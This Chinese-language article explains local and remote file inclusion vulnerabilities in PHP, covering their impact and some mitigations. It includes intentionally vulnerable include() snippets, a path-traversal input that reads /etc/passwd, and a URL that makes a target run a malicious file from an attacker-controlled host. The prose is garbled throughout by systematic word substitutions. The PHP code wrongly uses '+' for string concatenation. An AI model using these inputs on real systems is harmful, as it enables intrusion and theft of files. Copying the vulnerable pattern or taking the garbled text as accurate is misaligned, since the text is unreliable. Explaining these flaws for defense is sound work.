先容
文件包含漏洞利用运用程序中的动态文件包含机制,从不受信赖的源导入恶意的可实行代码。常日当运用程序接管用户输入并将其通报到文件包含API时就会引发这类的漏洞,从而在易受攻击的运用程序高下文中加载恶意代码。
常日,当漏洞许可在目标做事器上加载文件时称为本地文件包含(LFI),当攻击者能够在运用程序中加载远程代码时称为远程文件包含(RFI),这种技能增加了在目标做事器上实行恶意代码的机会。
影响及危害
此类漏洞的影响取决于运用程序如何利用所包含的文件,可能表现为基本的任意文件读取、还可以是做事器端要求假造,乃至远程代码实行(RCE)。
如果文件在运用程序的相同代码高下文中运行,这可能被用于在托管根本举动步伐中实行远程代码(RCE)从而得到立足点,转向横向移动到全体网络中的其他做事系统实行未经授权的命令,并完备危害运用程序的机密性、完全性和可用性。
场景
在许多措辞中都可能包含未经授权的文件,PHP特殊随意马虎受到RFI攻击,由于动态包含文件是PHP编程中广泛利用的模式。
下面的代码片段存在LFI问题,用于通过用户供应的HTTP参数“template”,动态加载指定确当地PHP文件。
<?php include("templates/" + $_GET['template']); ?>
攻击者可以通过向参数“template”通报恶意确当地路径来访问存在漏洞的PHP网页,进而访问不被许可确当地文件,例如/page. PHP ?template=../../../etc/passwd显示系统密码文件,或者/page.php?template=../upload/file以PHP脚本的形式运行一个意外文件。
下面的RFI片段供应了对路径的第一部分的完备掌握,许可攻击者加载远程url。
<?php include($_GET['template'] + ".php"); ?>
攻击者可以在他掌握的web做事器上驻留恶意PHP文件,然后通过访问/page.php?template=http://www.attackerwebsite.com/malicious ,在目标做事器上实行该malicious文件。
如何防护
可能的话,开拓职员该当避免利用用户供应的输入构建文件路径字符串,特殊是当资源公开给用户或在运行实行时。
如果须要将用户供应的输入通报给文件系统API,开拓职员必须确保以下内容:
1.严格哀求只接管已知的、信誉良好的候选工具来验证用户输入。
2.如果无法根据许可列表进行验证,那么验证至少该当确保输入中只包含许可的内容。
